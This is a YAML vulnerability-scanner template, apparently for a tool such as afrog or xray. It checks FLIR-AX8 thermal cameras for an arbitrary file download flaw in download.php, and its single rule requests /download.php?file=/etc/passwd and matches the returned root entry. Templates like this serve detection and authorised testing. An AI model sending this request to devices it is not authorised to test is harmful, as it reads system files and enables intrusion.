id: flix-ax8-download-read-file

info:
  name: FLIR-AX8 download.php 任意文件下载
  author: zan8in
  severity: high
  description: |
    FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
    app="FLIR-FLIR-AX8"
  reference:
    - http://wiki.peiqi.tech/wiki/iot/%E8%8F%B2%E5%8A%9B%E5%B0%94/FLIR-AX8%20download.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8B%E8%BD%BD.html

rules:
  r0:
    request:
      method: GET
      path: /download.php?file=/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
